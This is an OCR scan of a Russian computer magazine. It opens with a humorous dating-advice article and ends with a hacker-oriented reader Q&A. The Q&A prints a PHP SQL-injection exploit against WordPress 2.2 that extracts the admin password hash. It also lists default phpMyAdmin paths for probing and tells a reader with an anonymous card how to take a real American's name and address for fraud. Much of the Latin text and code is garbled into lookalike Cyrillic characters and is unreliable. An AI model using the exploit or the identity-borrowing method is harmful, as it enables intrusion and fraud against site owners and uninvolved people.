том, будет ли у вас секс, принима- 
ется женщиной в течение первых 
30-45 секунд знакомства. Теперь 
понимаешь, почему внешний вид 
сзапахом вместе играюттакую 
важную роль? 

• Умение понимать . Конечноже, 
речь идет не о понимании тон- 
костей взаимоотношений между 
подругами ее подруг. Критически 
важноуметь понять, понравился 
ты девушке, или нет. К кому-то это 
приходит само собой (многие из- 
вестные дамские угодники толстых 
фолиантов не читали), к кому-то — 
не всегда. Рассмотрим классиче- 
скую ситуацию. 

Допустим, в бареты увидел де- 
вушку. Осмотрел ее с ногдо головы 
(ОК-ОК, хорошо, с груди до ног, и с 
ног — до лица), посмотрел влицо, 
попытался поймать взгляд... и вот 
тут начали свой отсчет секунды, 
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о которых я говорил чуть выше. 
Задержала взгляд — доставай за- 
четку, рисуй себе плюс. Улыбну- 
лась — рисуй второй. Повернулась 
в твою сторону корпусом или 
сделала любое другое движение 
потраектории ктебе («рассмо- 
треть получше, оценить») — рисуй 
в зачеткутретий плюс и начинай 
тихо радоваться. Посмотрела во 
второй раз — все, проверяй себя 
на предмет застегнутой ширинки 
и запаха изо рта, бери свой стакан 
и иди знакомиться. Специалисты 
утв е ржда ют, что та ка я « це п о ч ка » 
(взгляд-улыбка -поворот-взгляд) 
является довольно неплохим 
признаком сексуального интереса 
и в идеале нарушаться не должна. 
Наоборот, выпадение из нее 
звеньев может свидетельствовать, 
что интереса кактакового нет, а по- 
вторный взгляд со стороны дамы 
был продиктован пятном от про- 
цессорной пасты утебя на рубаш- 
ке. В общем, после реализации 
«цепочки» приступай кобщению 
и постарайся ничего не испортить, 
поскольку положительный задел 
уже создан, и тебе остается его 
только поддержать. 



• Личный опыт . Выйди в люди. 
Знакомься сдевушками. Общай- 
ся с ними во всех смыслах этого 
слова. На собственном опыте 
узнавай, что им нравится, а что нет. 
В качестве примера приведутебе 
«пи каперские» тусовки. Тусовки 
эти совершенно закономерно 
подвергаются критике по поводу 
отъема денег у населения, за 
насаждение в головы обучаемых 
кучи штампов (да, стандартные 
драйверы ко всем девушкам не 
подходят). В чем же их единст- 
венный плюс? Плюс в одном 

— заставляют практиковаться. 
Выходить на улицу, знакомиться, 
обзаводиться номерами теле- 
фонов, поздравлять случайных 
девушек с праздниками, смотреть 
в глаза ит.п. Согласись, это можно 
сделать и самостоятельно, — все 
дело в личной мотивации. Это как 
в физкультуре: кого-то мотивирует 
злой тренер, кого-то — уплаченные 
за абонемент деньги, а кто-то про- 
сто идет, рветжелезо и достигает 
результата. 

• Психологические практики . 

Если погуглить, окажется, что 
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тайных психологических решений, 
способных помочь в тяжелом 
ремесле растлителя совершенно- 
летних, существуют просто тысячи. 
На самом деле, чудесных способов 
здесьтрадиционно не существу- 
ет, поэтому психокодирование, 
зомбирование, психозаражение, 
конский возбудитель и секретный 
одеколон с феромонами можно 
сразу выбросить на свалку исто- 
рии. Я серьезно! Честно искал, об- 
щался с психологами и психиатра- 
ми, курил документацию, отделял 
зерна здравого смысла от плевел 
кидалова и шарлатанства... все 
пустое! Сила приходит к нам в виде 
простого человеческого общения, 
основанного на простых вещах, 
которые многим людям, тем не ме- 
нее, кажутся сложными. Чтобы не 
быть голословными, побеседуем 
натему организации межполовых 
контактов с нашим бессменным 
пси-консультантом, врачом- 
психотерапевтом, специалистом 
по НЛП, Ириной Геннадьевной 
Трасковецкой. 

тг : Ирина Геннадьевна, что такое 
НЛП? 

И. Г: Нейро-лингвистическое про- 
граммирование — изобретение 
математического ума. Концепция 
поведения и методика, построен- 



ная на принципе обратной связи. 
Кажется, компьютерщикам не 
надо объяснять, что это такое? 
Главный принцип — «если не 
работает, попробуйте что-нибудь 
другое». Ну и еще пара десятков 
неглавных, которые в основном 
используют НЛ П-терапевты и 
прочие, которые знают, что с этим 
делать. Пожизни, даже без при- 
менения НЛП, подход Главного 
принципа решает многие про- 
блемы и широко применяется. 

Вам же не придет в голову упорно 
ехать в столб, коль вы уже один раз 
в него вписались? Вы «сделаете 
что-то другое» — примете вправо 
или влево, в зависимости оттого, 
где меньше битого стекла и прочих 
неприятностей. 

тг : Мощно сказано, но я все равно 
ничего не понял. Скажите честно: 
работаютли все эти подстройки 
под визави, отзеркаливание 
позы, подстройки под дыхание и 
систему восприятия? 

И. Г: Работают. Правда, все это до- 
вольно нудно и непрактично. Есть 
способы лучше. 

т : Какие? • 

И. Г: Ане скажу. Это как искусство 
кунг-фу, некоторые вещи невоз- 
можно понять без понимания 



базы. А«база» — она частично 
описана в рамках этой статьи. 
Осталось ее проработать, что на 
практике окажется значительно 
сложнее чтения. 

тг : Хорошо, а с чем связано 
такое эпическое количество 
шарлатанов в области НЛП? Как 
их распознать, как держаться 
подальше? 

И. Г: Эпическое количество шар- 
латанов возникло отэпического 
бардака в сфере выдачи дипломов 
в нашей стране, а также от про- 
стоты освоения базовых навыков 
(глазодвигательных стереотипов, 
например). На родине основателей 
НЛП, в США, сертификате получен- 
ном образовании — это солидная 
штука, ее просто та к в переходе не 
купишь. Как распознать? Если речь 
идет о получении консультации или 
обучении — смотрите на то, кто учил 
данного гения, кто его наблюдает 
(психолог, врач-психиатр, врач- 
психоте рапе вт должны содержать 
личность вухоженном состоянии, 
а потому обязаны иметьличного 
терапевта и супервизора). При 
наличии обоих — можно проверить 
репутацию. Как говорится, гугл 
в помощь — почитать, кто такие, 
где учились, каку них с практикой. 
Ну и главное. Профессионалы не 



стесняются обозначить по вашему 
вопросу, кто, где, как дол го их учил, 
«лечил» (это про личную терапию) 
и наблюдаетсейчас. Если гений 
замялся «нууу... воооот... курсы под- 
вального менеджмента в поселко- 
вой академии естественных наук» 

— привет горячий. Прочитал пару 
книг, послушал парулекций, мало 
что умеет. Слов можетзнать много. 
Толку — чуть. 

тг : А большое ли значение в меж- 
половых контактах имеетзнание 
психологических практик? Надо 
ли читать хитрые книжки и ходить 
на психологические курсы? 

И. Г.: В межполовых контактах 
главную роль играет чувство 
ритма. До постели — тоже. Если 
девушке понравилось, как вы 
с ней танцуете — это еще один 
плюс. Если вы оттоптали ей все 
ноги и вместо вальса сбацали 
ламбаду, считайте, что вечер 
окончен. Умение танцевать 
парные танцы — это еще и умение 
чувствовать партнершу. Кто 
скажет, что это в межполовых 
контактах лишнее — может кинуть 
в меня камнем. Хитрые книжки и 
психологические курсы, конечно, 
могут рассказать про многое — на 
курсах учатучиться на курсах. Так 
же, как в школе: «пятерка» за пя- 



► 138 
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ОБОЛЬЩЕНИЕ ВО МНОГОМ ПОХОЖЕ НАТВОРЧЕ- 
СТВО. ВКЛЮЧАЙ ФАНТАЗИЮ 



тый класс означает«пятерку» за 
умениеучиться в пятом классе. А 
не по математике. Хотите научить- 
ся строить отношения — стройте 
отношения. Л ибо с помощью 
набивания шишек (на личном 
опыте], либо в группе, с терапев- 
том. Всякие группы личностного 
роста сейчас доступны, кажется, 
даже в тундре. 

□С: Расскажите, пожалуйста, тай- 
ный способ. Я бы хотел овладеть 
секретной системой соблазнения 
любойженщины взоне прямой 
видимости. 

И. Г: Полюбите ее с первого взгля- 
да. Не«признайтесь в любви», а 
полюбите, возжелайте, вознесите 
на пьедестал, сойдите сума. 

Тогда начнете говорить стихами, 
излучать нежность, чувствовать, 
в какую сторону ветром колыхнуло 
ее волосы.... В общем, не скажу. 
Все-таки, женщинам тоже надо 
дать возможность выбирать. 

т : А какие книжки посоветуе- 
те, по каким ключевым словам 
гуглить и какие курсы стоит по- 
сещать? 

И.Г.: Пару слов в ответах на 
прежние вопросы я подкинула. А 
вообще — Гугл ничего не знает про 
девушку, которая вам понрави- 
лась. Лучше спросите ее отом, что 
хотите знать. И расскажите о себе 
то, о чем спроситона. Обязательно 
поинтересуйтесь, какона соби- 
рается предохраняться, и нетли у 
нее каких-то остро нелюбимыхза- 
нятий. Ну, не вместо «здравствуй- 
те», а в соответствующее время. 

И, разумеется, презерватива в 
заднем кармане это не отменяет. 

~5Г : Я робок. Стесняюсь знако- 
миться сдамами и оченьбоюсь 
облома. Что делать, как с этим 
справиться? Чтение этой статьи 
не помогает. 

И. Г: Могу предложить несколько 
вариантов: 

1. Забить на девушек, вести 
затворнический образжизни, 



общаться с компьютером. 

2. Стать женоненавистником, за- 
расти прыщами и бородой, нелестно 
отзываться оженщинах в принципе. 

3. Начать работать над собой. 
Идеально — найти себе компанию 
по интересам. То есть, не в Сети, а в 
клубе, кафе, на лужайке с палаткой 
— гдеугодно. Общайтесь! Переби- 
райте разные способы поведения, 
разные способы разговаривать, 
петь, плясать, в общем, узнайте 
себя. Это только в сказке «познай 
самое себя» — чисто девачковое 
занятие, чтоб на бал не ходить. 
Мальчика делает мужчиной, в 

том числе, способность выйти в 
мири противостоять его вызовам 
без применения допинга. Ежели 
аутотренинг ничего не дает, тогда 
остается пун кт следующий. 

4 . Идите в группу, которую ведет пси- 
холог или психотерапевт. Учитесь 
общаться в безопасной среде. Там, в 
конце концов, никто в лоб не стукнет, 
даже и пожалеть могут по мере 
надобности. Только имейте в виду, 
что в большинстве групп запретна 
секс междуучастниками огова- 
ривается особо. Дабы не вредить 
процессу самосовершенствования, 
самопознания и самонаучения. В 
конце концов, когда процесс будет 
завершен, за пределами группы 
ничто не будет вас связывать. 

БУДЬ ДОБР. 
ПРАКТИКУЙСЯ 

Из прочитанного ты могзаклю- 
чить, что я каким-то образом 
критикую психологические статьи 
и околопсихологическиетексты. 
Это не совсем так — пожалуйста, 
читай статьи по НЛП, кури доки по 
психологии общения, учи наизусть 
«Языктелодвижен ий» Алана 
Пиза, но не воспринимай все 
эти тексты как некие алгоритмы, 
правила и непреложные догмы. 
Если ты считаешь, что в свою 
практику да мско го угодника нужно 
ввести элементы НЛП, вроде 
отзеркаливания позы и прочего, 
пожалуйста, вводи. Но делай все 
это органично, иначе, судорожно 



копируя позу и подсчитывая, 
шевеля губами, пульс и частоту 
дыхательных движений, ты риску- 
ешь показаться живущим в своем 
мире шизофреником. Тоже самое 
касается и других психологиче- 
ских практик, вроде «активного» 
выслушивания. Да, литература 
учит нас, что человеклюбит, когда 
половинуего вопроса возвращают 
емуже, сопровождая все это сво- 
им «пониманием», но все же будь 
поосторожнее с фразами вроде: 

«Я понимаю, что тебе тяжело от 
того, что соседи со второго этажа 
затопили тебя потоком нечистот. 

Ты чувствуешь дискомфорт, 
тревогу и неуверенность в буду- 
щем», поскольку, злоупотребляя 
штампами, психологическими 
терминами и явными повторами 
чужих слов, ты рискуешь потерей 
эмоционального контакта. Как 
вариант, тебя могут заподозрить 
в экспериментах на живых людях 
без их согласия (в процессе на- 
писания диплома в каком-нибудь 
психологическом быдловузе]. 



ЗАКЛЮЧЕНИЕ 

От меня ожидали тайных ме- 
тодик и сокровенных знаний, 
а получилось, что в области 
интимных отношений все про- 
и сходит точно также, как во 
всех прочих сферах жизнедея- 
тельности. Нет тайных способов 
накачать мышцы и стать супер- 
меном, не отходя оттелевизора, 
не существует кармических 
наноаудиотехнологий для 
изучения иностранных языков, 
не выйдет стать программистом, 
прослушивая аудиокурс «]аѵа 
ргодгаттіпд Ео г сіиттіез». 
Иначе говоря, единственным 
способом продвинуться в теме 
так и остается классика — ку- 
ритьтеорию и не отлынивать от 
практики. В критичных вещах, 
вроде поднятия самооценки и 
овладения тонкостями обще- 
ния, не исключено, что придется 
прибегнуть к индивидуальной 
и/или групповой психотерапии 
под руководством опытного 
психотерапевта. Удачи! цс 



Совет №5. Поиграй с друзьями в пейнтбол! 

Это отличный повод провести день на свежем воздухе. 

Плюс физическая активность. Плюс шашлыки. Идеальный 
выходной день, который принесёт тебе удовольствие, а твоему 
организму — здоровье. 
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0: Как чекать боодіе РВ, я уже таю. Каким 
образом можно написать чегіё)ьдругого мерила 
популярности сайта — Аіехдоапк? 

А: Очень просто! Аіеха. сот даже предоставляет 
специальный ХМ Ь-интерфейс для вебмас- 
теров, с помощью которого можно чекать не 
цько, собственно, гапк, но и многие другие 
важныеТтаюа метры домена (возраст, количес- 
тво ссылающихся сайтов, рост аудитории за 
месяц и т.д.]. 

Вот пример простейшего чекера параметра 
гапк: 



ШЬ=" [ /ЧП ] +” техт= 11 (\й+) "\/>/і ' , 
$сопкеп1, $таксЪ.ез)) 

{ 

геСигп кгіт ( $та1сііез [ 1 ] ) ; 



аптайм, версию уС и другие параметры удален- 
ного хоста: 



} 



геСигп * Опкпоші ' ; 



ргіпС а1ехагапк( 'доодіе.сош' ) ; 



?> 



<?ркр 

Іипскіоп аіехагапк ( $иг1 , 

$ ір = ' 127.0.0.1' ) 

{ 

$иг1 = ргед_гер1асе ( 

1 /Ыкрз? : \/\//і ' , " , $иг1) ; 
$иісІ = зргіпкі ( 

' 2007%02сЗ.%02 сЗ.% 0 2 сЗ.% 0 2 сЗ.% 0 2 сЗ_ ' , 
гапсі (1,12) , гапсі (1,28) , 
гапсі (1,24) , гапсі (1,60) , 
гапсі (1,60) ) ; 

$а1еха_иг1 = ' ЬДкр :/ /хші . аіеха . 
сот/с1а1а?с1і=10&с1а1=пза&ѵег=диігк- 
зеагсЪ.зкакиз&иісі= ' . $иісі . 

' &изегір= 1 . $ір . ' &иг1=' . 
игіепсосіе ( $иг1 ) ; 

$сопкеп1 = 1і1е_дек_ 
сопкепкз ($а1еха_иг1) ; 

11 (ргед_та1ск ( 7 /<РОРИЬАКІТУ 



Этотпримерты сможешь с легкость переделать 
под парсингдругих элементов ХМІ_-ответа 
Аіеха ’ы. 



<?ркр 

$пе1сга11 = 1і1е_де1_ 

сопіепіз ( ' Ыір : / /зеагсксіпз . 

пеісгаіі . сош/?розікіоп=1іші1есі&1іоз 

1=доод1е . сот 1 ) ; 

ргед_та1с]г ( 1 | <а Ьге1= "ІШІр : // 

иркітеХ . пе1сга11\ . сот/ир/ 

дгарк/ \ ?коз1= [а-г0-9\ ( .+?)</ 

а> I і ' , $пе1сга11 , $оз_агг ) ; 

ргіпі $оз_агг[1] ; 

?> 



0: Аесли я не хочу писать РНР-скрипты для про- 
верки Аіеха гапк? Как чекать этот показатель 
прямо в онлайне? 

А: Если лень одолела тебя, то для сабжа могу 
посоветовать использоватьлибо сам портал 
аіеха.сот (что крайне неудобно, ибо позволяет 
за раз проверятьтолько один домен), либо 
любой из онлайн-сервисов по массовой про- 
верке Соодіе РП/АІеха гапк; например. ШрУ/ 
ехІга-ІгаНіс.сот/рга сбескег.Ыт.ги.Ыт . Из 



А вообще, юзай старый добрый ІЧтар [проек- 
ту, кстати, вот-вот стукнет 10 лет, — 
Прим. Віера]. 



недостатков сервиса могу отметить, что за один 
разон позволяетчекатьлишь Ібдоменов. 




0: А как средствами РНР определять ОС, крутя- 
щуюся на удаленном сервере? 

А: Проще всего обратиться конлайн-сервису 
пеісгак.сот . который должен определять 



0: Купил анонимную кредитку с балансом без 
привязки к какому-либо имени/адресу. Где найти 
реально существующие, нолевые имя и адрес? 

А: Специально для тебя американцы создали 
замечательный сервис ШрУ/ѵѵЫіерадез. 
апѵѵѵЬо.сот . который позволяет провести 
поиск по огромной базеамеров :). 

К примеру, я его использую так: 

1 . В поле«Еаз1: Ыате (Ведиігеб)» вбиваю любую 
распространенную амерскую фамилию, напри- 
мер, <Оаскзоп» [кіР! — Прим, ред); 

2. В списке «Віаіе» выбираю любой более или 
менее крупный штат, например, «СА»; 



о 
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4. Использую любой результат, выданный поис- 
ком, например: 

А Ь Ьаскзоп 
Зоше асісігезз 

Зоше сіЬу, СА зоте зір соЬе 
(408) зоше рЬопе питЬег 

0: Как бы мне проверить, какую информацию 
передает мой компьютер в интернет? 

А: Недавно открывшийся сер вис ууЬоегпеі с удо- 
вольствием предоставляеттебетакую возмож- 
ность. Просто зайдя на его главную страницу (а 
лучше — на расширенную вереи ю ѵѵЬоег.пеі/ехі ]. 
ты узнаешь о себе следующие да иные: 

1. ІР Асісігезз (имя хоста, диапазон ІР, название 
организации, является ли этот ір проксиком, 
ѵѵЬоіз]. 

2. 1_оса*іоп (континент, страна, регион, город, 
почтовый код, широта/долгота, положение на 
гуглмэпс]. 

3. Тіте (зона, локальное время, системное вре- 
мя, ІІТС, 0МТ, время восхода и захода солнца]. 

4. НТТР Неасіегз ( всехэдеры, посланныетвоим 
браузером]. 

5. Бсгіріз (поддержка АсбѵеХ, ѴВЗсгірІ, 
^ѵаСсгірІ, ^ѵа]. 

6. Версия ОС, данные монитора (разрешение, 
глубина цвета]. 

7. І\Іаѵіда1:ог (все данные браузера]. 

8. Ріидіпз (плагины, установленные в браузе- 
ре]. 

Как видишь, скрыть что-либо в интернете от 
посторонних глаз становится все труднее и 
труднее. Так что, не забывай юзать прокси/ 
соксы/ѴРЫ. 

0: Можно ли как-то обеспечить свое инкогнито 
«ВКонтакте»? 

А: ОееІР, модератор ѴѴН В, недавно опублико- 
вал один из способов остаться анонимным в 
этой популярнейшей социальной сети. Заклю- 
чается он вот в чем: 

1. Заново регистрируемся «ВКонтакте», 
заполнив все поля, кроме полей с именем и 
фамилией; 

2. Копируем в адресную строку браузера 
ІаѵазсгірІ-код: 

ДаѵаЗсгірС: Йііз . с!ізаЫес1=Цгие ; 
ЬосшпепД . гедМе . зиЬтіС ( ) ; 




З.Жмем <Еп1ег> и наслаждаемся инкогнито без 
имени и фамилии :] 

0: Как 100%-но можно определять версии и 
типы движков распространенных форумов? 

А: Стопроцентных способов не существует, но 
для других случаев резервистантичата сІ_х на- 
писал неплохой скрипт под названием «Рогит 
Оеіесіог». Вот что умеет эта софтина: 

• Определяет тип форума (на данный 
момент поддерживается распознавание 
ІРВ , рЬрВВ, ѵВиІІеСіп, МуВВ) 

• Определяет версию форума по разным 
критериям 

• Определяет возможные уязвимости 
форума и предлагает подходящие для 
них эксплойты (конечно, паблик) 

• Определяет ТиЦ и РК сайта 

• Поддерживает прокси, зоскзБ, прок- 
си с авторизацией, зоскзБ с автори- 
зацией 

Скачатьтулзу и почитать подробней о ней 
ты сможешь втопике форума: ЬВ 
апіісЬаЬгиЛЬгеасН 14708.ЫтІ . 

0: В каких директориях на сервере может по 
дефолту стоять рІірМуАсІтіп? 

А: Вот небольшой список самых распростра- 
ненных директорий, куда админы ставят 
рЬртуабппіп: 

/рЬрМуАсІтіп-х . х . х/ ( здесь «х . х . х» — 
версия скрипта) 

/рЬрт/ 

/рЬршу/ 

/рЬршу асітіп/ 

/ РМА/ 

/шузді/ 

/асітіп/ 

/въ/ 

/бЬабшіп/ 

/рЬршуабшіп2 / 

/шуздіасітіп/ 

/шузді -асЗтіп/ 

/шуабшіп/ 

/рЬрМуА/ 

/рЬртуаЬ/ 

/рЬрМуАЬті / 

А вообще, для поиска рЬртуабтт можно 




рЬртуасІтіп], файл гоЬоіз.М и простую сме- 
калку. 

0: Не знаешь, как работать в шелле с дампами 
тузці? 

АіЛегко! По большому счету, тебе понадобятся 
всего 2 команды: 

1 . Импорт дампа в базу 
шузді -ЪЦЬозС] -и[изег] -р[разз] 
[Ьазе] <бишр.зд1 
2 . Экспорт дампа из базы 
шуздібишр -Ь [ЬозС ] -и[изег] -р[разз] 
[Ьазе] >Ьишр.зд1 

Далее ты сможешь чередовать эти команды 
сдругими. Например, для извлечения дампа 
с последующим его архивированием можно 
использовать конструкцию: 

шуздібишр -Ь [Ьозб ] -и[изег] -р[разз] 
[Ьазе] I баг гсіѵ Ьазе . баг . дг 

0: Каким образом через веб-интерфейс 
можно бэкапить большие базы данных тузці? 
РГірМуАсіппіп и иже с ним не справляются! 

А: Для подобных целей вся хакерская братия 
давно использует замечательный РНР-скрипт 
Сурех Ритрегі зѵрех.пеі/ргосіисіз/сіиппрег ]. ко- 
торый, в отличие от многих подобных скриптов, 
не загружает бекап-файл целиком в память, 
благодаря чему ему безразличен размер базы 
данных, и он одинаково быстро работает как 
с маленькими, так и с большими объемами 
данных. 

Основные преимущества тулзы: 

• высокая скорость работы; 

• работа с базами любого размера; 

• простота использования; 

•удобный интерфейс; 

• многотомные бекапы; 

• МуЛЬТИЯЗЫЧНОСТЬ; 

• компактность. 

0: Прочитал твои статьи про малоизвестные 
уязвимости ѴѴогсІРгезз. Раскрой еще какой-ни- 
будь баг. 

А: Хорошо :]. Расскажу о еще одной 
неопубликованной зці-инъекции Ворд- 
пресса, которую мельком упомянул уже 
небезызвестный тебеА[ех Сопсба в своем 
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КУ 



вок поста будет равным (сИезЕ, роз1:_ехсегр1: =», 
а пермал и нюомТюсТэ^удет что-то вроде этого: 

Ьир://Іа^/ѵѵр222/200т/01/абтіп:21232Г29 



функция, конечно, всем хороша для защиты 
данных, передаваемых с помощью метода 
РІІТ в аіют-протоколе, но невнимательные 
разработчики забыли защититься от просто- 
го бэкслеша «\» (а ѴѴогсІРгезз, как известно, 
автоматически сл еш и рует только СЕТ, РОСТ, 
С00К1Е, 5ЕРѴЕР пакеты]. Если принять во 
внимание тот факт, что она присутствует во всех 
версиях движка, начиная от2.2 и заканчивая 
последней на сегодняшний день 2.7.1 , то 
можно понять, что это упущение представляет 
собой огромную опасность. 

В качестве примера использования скули я 
приведу код эксплойта для движка версий 
2.2 — 2.2.3 с правами ебіІ_роз1:5 (этого тебе 
будет вполне достаточно для поиска вариантов 
эксплуатации описываемой баги в более новых 
версиях вордпресса, таккакпро приватные 
эксплойты мне рассказыватьоченьнехочется): 



7а57а5і 


/743894а0е4а80ИсЗДІ 


да-да. логин и хеш 


пароля 


админа в конце]. 





<?р!ір 



$зіке= ' Іатег . сот 1 ; 

$раСЪ= ' /ѵф223 /хѵр-арр . рЬр?асРіоп=/ 

розк/1 ' ; / /тут айди поста 

$изег= ' есііког 1 ; / /логин на блоге 

$раззтлгсІ= ' ебібог 1 ; //пароль на блоге 

$аик1і=Ъазе64_ 

епсобе ( $изег . " : " . $раззѵ\гс!) ; 

$1р = Рзоскореп ( $зібе , 80, $еггпо, 
$еггзкг , 30) ; 

$баба= '<бееб> 

<епкгу> 

<іс!>ЕШкр : / / Іатег . сот/ 
ѵтр223 /2 009/03 /01 /Ь.е11о-ѵ\гог1сІ/</іс1> 
<кік1е буре= "Ьбті " >Резб\</ 
Ріб1е> 

<зиттагу куре= "ккті ">,роз§4 
пате=(зе1есб сопсак (изег_ 

Іодіп , 0x3 а , изег_разз ) бгот ѵдр_изегз 
ѵѵЬеге ІБ=1) ѵ/Ь.еге іб=1/*</зиттагу> 
</епбгу> 

</бееб> ' ; 



$оик = "РОТ $рабЬ. НТТР/1 . 1\г\п" ; 
$оик .= "Нозб: $зібе\г\п" ; 

$оик .= " Сопбепб-Туре : арріісабіоп/ 
абот+хт1\г\п" ; 

$оик .= "Соппесбіоп: С1озе\г\п" ; 
$оик .= "Юзег-Адепк: Орега\г\п" ; 
$оик .= " АибЬогіхабіоп : Вазіс 
$аикк\г\п" ; 

$оик .= "Сопбепб-ЬепдбЬ: 

" . збгіеп ( $баба) . " \г\п\г\п" ; 



хкеутар . покеусобеМар = кгие 



0: Как из лога формата Ісрсіитр (Ісрсіитр, 
ѴѴігегГіагк, Кізтеі и др) извлечь данные? 

А: На самом деле, очень многое можно сделать 
даже средствами самого снифера ѴѴігезЬагк 
І ѵѵѵѵѵѵ.ѵѵігезЬагк.огд ]. у которого круто прока- 
чаны возможности анализа. Однако упростить 




( 



О 




0: Есть несколько файлов, снятых телефоном, 
в формате .тр4. Засада в том, что сняли не в 
привычной горизонтальной ориентации, а — в 
вертикальной. То есть изображение получилось 
повернутым на 90 градусов. Как привести его в 
привычный вид (и, желательно, максимально 
просто)? 

А: Знакомая проблема :). Одно из решений — 
использовать какой-нибудь редактор видео. В 
этом случае удастся провернуть действие без 
потери качества (что называется «Іоззіезз»]. 
Подойдет всем известный редактор ѴігІиаШиЬ 
( ѵѵѵѵѵѵ.ѵігІиаІсІиЬ.огд ]. Алгоритм следующий: 

1. Выбираем файл через меню «Еііе -> Ореп 
ѵібео Еііе»; 

2. Переходим в «Ѵібео Еіііегз», чтобы вы- 
брать фильтр (пункт АсИ) Воіаіе. 

3. Далеезадаем вариантпреобразований: «Іек 
Ьу 90» или «гідЫ Ьу 90». 

После этого остается только сохранить видео- 
файл с внесенными изменениями. В случае 
с видео приходится настраивать парамет- 
ры сжатия. Первым делом в меню «Ѵібео» 
необходимо выбрать«Еи11 ргосеззіпд тобе». 
Затем — выбрать нужный кодек через «Ѵібео -> 
сотргеззіоп». 

4 . После этого выбирай файл «Еііе Заѵе аз 
АѴІ». 

5 . Начнется рендеринг файла, в результате 
которого будет готовый АѴІ-файл. 

Другой вариант совсем простой — использо- 
вать для этой цели известный просмотрщик 
Рісаза ( рісаза.доодіе.сот/іпіі/ги ). в котором 
также есть фильтр для поворота изображения. 



задачу можно с помощью автоматизирова 
утилит. 

Одна из самый классных — сЬаозгеасіег 
( сбаозгеабег.зоигсеЕзгде.пеі ]. написания 
на РегГе. Отдаешь на вход утилиты лог-©айл 
в формате Ісрбитр или зпоіб, а на выход» 
получаешь — оформленный в виде НТМИ-стра- 
ницы отчете воссозданными Іеіпеі-сессиями, 
файлами, переданными РТР, пропарсенным 
Ыір -трафиком (НТМЕ-странички, изображения 
01Е и 6РЕ0] ит.д. ит.п. 

Тулза рсарзірбитр ( зоигсеіогде.пеі/рпзіесіз/ 
рзірбитр ] поможет в случае, если необходимо 
извлечь из дампа с перехваченным трафиком 
ЗІР-сессии, то есть голосовой трафик. При этом 
каждая 5ІР-сессия сохраняется в отдельный 
файл для удобного прослушивания. 

У БтЬзпі^ ( ЬирУ/ѵѵѵѵѵѵ.Ьзс.Іг/геззоигсез/оиІіІз/ 
зтЬзпіЕУіпбех.ЫтІ.еп ] задача другая — сохра- 
нить файлы, передавемые по протоколу 5МВ/ 
СІЕ5. Другими словами, все то, что передается 
по локальной сети через «Сетевое окружение». 
Если нужно повторно воспроизвести сессию 
на основе перехваченного трафика, то лучшего 
инструмента, чем Тсргеріаѵ ( ісргерІаѵ.зѵпЕп. 
пеі ]. не найти. Входящая в наборутилита 
Іюргеѵѵгііе позволяет внести изменения в заго- 
ловки пакетов, сохраненных в дампе снифера. 
Аісргеріау «проигрывает» дамп в сеть на 
нужной скорости: кергеріау --Іпбб1=еб]т0 
затріе .рсар. 



О: В прошлом номере ты писал про 2-Нор55Н- 
туннель. А как еще можно сделать что-то вроде 
55Н Ргоху? 

А: Предположим, есть сервер зегѵі , адрес 
которого — зегѵі .туботаіп. сот. Помимо этого 
есть сервер зегѵ2 с адресом 192.168.1 .100, 
который находится в сети, доступной с зегѵі , 
но недоступный извне. На локальной машине 
имя юзера — Іосизег, а на всех остальных — 
гетизег. 

Чтобы создать 55Н -прокси, пишем в -/.ззЬ/ 
сопЕд следующие строки: 



Нозк * 

РогѵѵагбАдепб уез 



О: После установки ѴМѴѴаге на дистрибутиве 
Ресіога 1 0 (ізо с вашего диска) столкнулся с 
проблемой — в гостевых машинах клавиатура 
работала совсем не корректно. Например, на- 
жатие кнопки Цр срабатывает как <А1(+Р2>. Как 
решить проблему? 

А:Да, я сам столкнулся стаким багом. Испра- 
вить его поможет строчка в файлеМс/ѵтѵѵаге/ 
сопЕд: 



Нозк зегѵі 

НозкЫате аірка . риркіп . пек 
Цзег Іосизег 



Нозк зегѵ2 

НозкЫате 192.168.1.100 
Юзег гетизег 

РгохуСоттапсІ ззЬ. зегѵі пс %Ъ. %р 



Что мы получаем в результате? Для машин 
зегѵі и зегѵ2 мы создали так называемые 
алиасы. На 55Н мы подключаемся под обыч- 
ным юзером, набрав в консоли «ззЬ аірба». А 
набрав «ззЬ Ьеіа» мы сможем приконнетиться к 
недоступному доселе серверу зегѵ2, подклю- 
чившиськнемучерез машинуаірба. В качестве 
прокси используется известная тулза пеісаі 
( пеісаі.зоигсеіогде.пеі: ) . ЭЕ 
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НТТР://ѴѴѴѴѴѴ2 






Моге» [ 



ѴѴНаіТЬеРоп+ ЬІрІолЕІ О-ыіпсГв* ■■Ікііагі ГТііяиІНі 

*>иЬпіі( он ііплдг Г \л|прН\ Іітыгц- 1 1 1 

^ееп л (опт ш и*е апсі іѵаііі го кію\ѵ міші к І5? 

ѴіЬгпй ап іпиде [о МиіШоііі Іо Гш<1 Ии гімей тЛгію іг міг ИшЬіде. №, № сіоак- 
(Іг,ірс<1 Есгі спМшшт ісікі а ІідпсЕ ні Иіс іая іНеРот і опіт 



ЪиЬппіІ ѵоиг ітідс Ііеге < 
а Гііс: 

Ог щ ШІ - | 

Тірь Іот орОтгі г«іі)іе: 






Поиск шрифта 
по шаблону 



ѴѴНАТТНЕРОЫТ? 

пеѵѵ.туіопіз.сот/ 

ѴѴЬаПЬеРопІ: 



Недавно ко мне обратились со странной для меня просьбой Со 

словами «Нужен воттакой шрифт» мне показали неприметную картин- 
ку с какой-то вывеской. Будучи уверенным, что пытливыеумы давно 
реализовали автоматический сервис, я согласился помочь и не ошибся. 
ѴѴЬаіТЬе Еопі: проглатывает любую иллюстрацию с текстом, разбивает 
ее на символы и проводитанализ, сравнивая со своей базой заготовок. 

В результате выдается несколько вариантов шрифтов с процентными 
показателями совпадения. А на случай, если автоматика не сработает, 
предлагается оставить заявку на специальном хелп-деске и ждать ответа 
от манья ков-дизайнеров. 







Делаем собственную 
сборку РігеЬх’а 




Р1КЕР0ХВ1Ли)ЕВ 

ДЬиіІсІег.ги 



алкивался ли ты с ситуацией, когда на разных машинах приходится 
устанавливать РігеРох, а потом муторно инсталлитьлюбимые дополнения 
Я сталкивался. Теперь я делаю проще: іЧбегти поможет создать соб- 

ственную сборку чисто под себя. Все просто: выбираешь версию огненн- 
ого лиса, платформу, а также нужные плагины и всегда можешь скачать 
собственный билд с актуальными по дате компонентами! 




РН0Т05Н0Р0ШЫЕ 

ѴѴММ.рЬоІОБНор.СОПП 

Компания АсІоЬе сдержала слово и выпустила онлайн-версию любимого 
РЬоІозЬор’а. Правда, на десктопную версию она похожа мало, но ведь 
никто и не собирался детально работать с многопиксельными фотогра- 
